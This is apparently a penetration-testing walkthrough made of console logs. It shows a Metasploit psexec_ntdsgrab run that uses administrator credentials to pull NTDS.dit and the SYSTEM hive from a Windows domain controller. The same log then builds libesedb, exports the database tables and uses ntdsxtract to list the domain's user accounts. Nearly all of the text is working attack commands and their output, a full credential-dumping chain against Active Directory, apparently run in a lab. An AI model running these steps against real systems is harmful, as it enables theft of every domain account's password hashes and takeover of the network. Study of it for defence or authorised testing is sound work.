psexec_ntdsgrab
msf auxiliary(psexec_ntdsgrab) > show options
Module options (auxiliary/admin/smb/psexec_ntdsgrab):
Name Current Setting Required Description
---- --------------- -------- -----------
CREATE_NEW_VSC false no If true, attempts to create a volume shadow copy
RHOST 192.168.10.32 yes The target address
RPORT 445 yes Set the SMB service port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain PENTEST.COM no The Windows domain to use for authentication
SMBPass pass1234PASS~ no The password for the specified username
SMBSHARE C$ yes The name of a writeable share on the server
SMBUser administrator no The username to authenticate as
VSCPATH no The path to the target Volume Shadow Copy
WINPATH Windows yes The name of the Windows directory (examples: WINDOWS, WINNT)
msf auxiliary(psexec_ntdsgrab) > run
[*] 192.168.10.32:445 - Checking if a Volume Shadow Copy exists already.
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[+] 192.168.10.32:445 - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.10.32:445 - Checking if NTDS.dit was copied.
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[+] 192.168.10.32:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.10.32:445 - Downloading ntds.dit file
[+] 192.168.10.32:445 - ntds.dit stored at /home/notfound/.msf4/loot/20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
[*] 192.168.10.32:445 - Downloading SYSTEM hive file
[+] 192.168.10.32:445 - SYSTEM hive stored at /home/notfound/.msf4/loot/20150911101930_default_192.168.10.32_psexec.ntdsgrab._928081.bin
[*] 192.168.10.32:445 - Executing cleanup...
[*] 192.168.10.32:445 - Cleanup was successful
[*] Auxiliary module execution completed
Install libesedb
root:/ /# uname -a
Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 GNU/Linux
root:/tmp/ntds /# wget --no-check-certificate https://github.com/libyal/libesedb/archive/20150409.zip
root:/tmp/ntds /# unzip -x 20150409.zip
root:/tmp/ntds /# cd libesedb-20150409/
root:/tmp/ntds /# ./synclibs.sh
root:/tmp/ntds /# git config --global http.sslverify false
root:/tmp/ntds /# ./autogen.sh
root:/tmp/ntds /# ./configure
root:/tmp/ntds /# make
root:/tmp/ntds /# make install
root:/tmp/ntds /# esedbexport 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
esedbexport: error while loading shared libraries: libesedb.so.1: cannot open shared object file: No such file or directory
root:/tmp/ntds /# ldconfig
root:/tmp/ntds /# esedbexport 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
esedbexport 20150409
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag1) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
root:/tmp/ntds/ntds_demo /# ls -l
total 33572
-rw-r--r-- 1 root root 12599296 Sep 12 12:48 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
-rw-r--r-- 1 root root 9773056 Sep 12 12:35 20150911101930_default_192.168.10.32_psexec.ntdsgrab._928081.bin
-rw-r--r-- 1 root root 1104 Sep 12 12:50 backlinks.map
-rw-r--r-- 1 root root 72779 Sep 12 12:50 childsrid.map
-rw-r--r-- 1 root root 11021285 Sep 12 12:39 datatable.3
-rw-r--r-- 1 root root 613 Sep 12 12:39 hiddentable.4
-rw-r--r-- 1 root root 42735 Sep 12 12:50 lidrid.map
-rw-r--r-- 1 root root 1013 Sep 12 12:50 links.map
-rw-r--r-- 1 root root 5777 Sep 12 12:39 link_table.5
-rw-r--r-- 1 root root 57 Sep 12 12:39 MSysDefrag1.9
-rw-r--r-- 1 root root 69512 Sep 12 12:38 MSysObjects.0
-rw-r--r-- 1 root root 69512 Sep 12 12:38 MSysObjectsShadow.1
-rw-r--r-- 1 root root 103 Sep 12 12:38 MSysUnicodeFixupVer2.2
drwxr-xr-x 5 root root 4096 Sep 12 12:44 ntdsxtract
-rw-r--r-- 1 root root 57725 Sep 12 12:50 offlid.map
-rw-r--r-- 1 root root 152 Sep 12 12:50 pek.map
-rw-r--r-- 1 root root 80 Sep 12 12:39 quota_rebuild_progress_table.11
-rw-r--r-- 1 root root 771 Sep 12 12:39 quota_table.10
-rw-r--r-- 1 root root 180963 Sep 12 12:50 ridguid.map
-rw-r--r-- 1 root root 75646 Sep 12 12:50 ridname.map
-rw-r--r-- 1 root root 3583 Sep 12 12:50 ridsid.map
-rw-r--r-- 1 root root 23677 Sep 12 12:50 ridtype.map
-rw-r--r-- 1 root root 14 Sep 12 12:39 sdpropcounttable.6
-rw-r--r-- 1 root root 96 Sep 12 12:39 sdproptable.7
-rw-r--r-- 1 root root 182041 Sep 12 12:39 sd_table.8
-rw-r--r-- 1 root root 50885 Sep 12 12:50 typeidname.map
-rw-r--r-- 1 root root 67338 Sep 12 12:50 typerid.map
root:/tmp/ntds/ntds_demo /#
NTDSXTRACT
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dscomputers.py datatable.3 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsgroups.py datatable.3 link_table.5 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsfileinformation.py 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsusers.py datatable.3 link_table.5 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsusers.py datatable.3 link_table.5 ./
[+] Started at: Sat, 12 Sep 2015 04:49:55 UTC
[+] Started with options:
[+] Initialising engine...
[+] Loading saved map files (Stage 1)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/tmp/ntds/ntds_demo/offlid.map'
[+] Rebuilding maps...
[+] Scanning database - 100% -> 3458 records processed
[+] Sanity checks...
Schema record id: 1774
Schema type id: 10
[+] Extracting schema information - 100% -> 1517 records processed
[+] Loading saved map files (Stage 2)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/tmp/ntds/ntds_demo/links.map'
[+] Rebuilding maps...
[+] Extracting object links...
List of users:
==============
Record ID: 3510
User name: Administrator
User principal name:
SAM Account name: Administrator
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 6b36f08b-c8cf-4eab-9e18-ae1bdce0e4f6
SID: S-1-5-21-495298362-4107897003-3932503283-500
When created: 2015-04-11 10:08:32+00:00
When changed: 2015-09-11 17:15:30+00:00
Account expires: Never
Password last set: 2015-09-11 17:15:30.234375+00:00
Last logon: 2015-09-11 17:15:59.890625+00:00
Last logon timestamp: 2015-09-11 17:15:30.218750+00:00
Bad password time 2015-04-11 13:34:02.937500+00:00
Logon count: 19
Bad password count: 0
Dial-In access perm: Controlled by policy
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, Administrator
Record ID: 3511
User name: Guest
User principal name:
SAM Account name: Guest
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 5d3b8bbf-5d0a-4573-96fa-ecdf0d68b2b9
SID: S-1-5-21-495298362-4107897003-3932503283-501
When created: 2015-04-11 10:08:32+00:00
When changed: 2015-04-11 10:08:32+00:00
Account expires: Never
Password last set: Never
Last logon: Never
Last logon timestamp: Never
Bad password time Never
Logon count: 0
Bad password count: 0
Dial-In access perm: Controlled by policy
User Account Control:
ACCOUNTDISABLE
PWD_NOTREQD
NORMAL_ACCOUNT
DONT_EXPIRE_PASSWORD
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, Guest
Record ID: 3557
User name: krbtgt
User principal name:
SAM Account name: krbtgt
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: d4a001b1-1d6f-4033-8396-5b50ed442416
SID: S-1-5-21-495298362-4107897003-3932503283-502
When created: 2015-04-11 10:21:27+00:00
When changed: 2015-04-11 10:36:38+00:00
Account expires: Never
Password last set: 2015-04-11 10:21:27.750000+00:00
Last logon: Never
Last logon timestamp: Never
Bad password time Never
Logon count: 0
Bad password count: 0
Dial-In access perm: Controlled by policy
User Account Control:
ACCOUNTDISABLE
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, krbtgt
Record ID: 3717
User name: python
User principal name:
SAM Account name: python
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 37218973-1887-4768-a98b-c9c797769ebc
SID: S-1-5-21-495298362-4107897003-3932503283-1111
When created: 2015-04-11 10:40:57+00:00
When changed: 2015-04-11 10:42:50+00:00
Account expires: Never
Password last set: 2015-04-11 10:40:57.406250+00:00
Last logon: 2015-04-11 11:27:15.796875+00:00
Last logon timestamp: 2015-04-11 10:42:50.531250+00:00
Bad password time 2015-04-11 11:26:15.359375+00:00
Logon count: 36
Bad password count: 0
Dial-In access perm: Controlled by policy
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, python
Record ID: 3720
User name: juzi
User principal name:
SAM Account name: juzi
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: b29311a1-595a-4a8c-a292-2f623ad2969b
SID: S-1-5-21-495298362-4107897003-3932503283-1114
When created: 2015-04-11 10:42:09+00:00
When changed: 2015-04-11 10:47:14+00:00
Account expires: Never
Password last set: 2015-04-11 10:42:09.375000+00:00
Last logon: 2015-04-11 11:50:41.937500+00:00
Last logon timestamp: 2015-04-11 10:47:14.015625+00:00
Bad password time 2015-04-11 10:54:08.187500+00:00
Logon count: 7
Bad password count: 0
Dial-In access perm: Controlled by policy
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, juzi
Record ID: 3722
User name: jin
User principal name:
SAM Account name: jin
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 23b53357-d35c-4586-a239-cd930497bf7a
SID: S-1-5-21-495298362-4107897003-3932503283-1116
When created: 2015-04-11 10:46:32+00:00
When changed: 2015-04-11 10:49:45+00:00
Account expires: Never
Password last set: 2015-04-11 10:46:32.250000+00:00
Last logon: 2015-04-11 10:49:49+00:00
Last logon timestamp: 2015-04-11 10:49:45.875000+00:00
Bad password time Never
Logon count: 5
Bad password count: 0
Dial-In access perm: Controlled by policy
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, jin
Record ID: 3726
User name: debug
User principal name:
SAM Account name: debug
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 114da9cb-7770-4ec8-b2b1-03b2505521db
SID: S-1-5-21-495298362-4107897003-3932503283-1119
When created: 2015-04-11 10:56:04+00:00
When changed: 2015-04-11 10:58:13+00:00
Account expires: Never
Password last set: 2015-04-11 10:56:04.515625+00:00
Last logon: 2015-04-11 17:17:21.250000+00:00
Last logon timestamp: 2015-04-11 10:58:13+00:00
Bad password time Never
Logon count: 95
Bad password count: 0
Dial-In access perm: Controlled by policy
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, debug
References
http://www.ntdsxtract.com/
https://github.com/libyal/libesedb/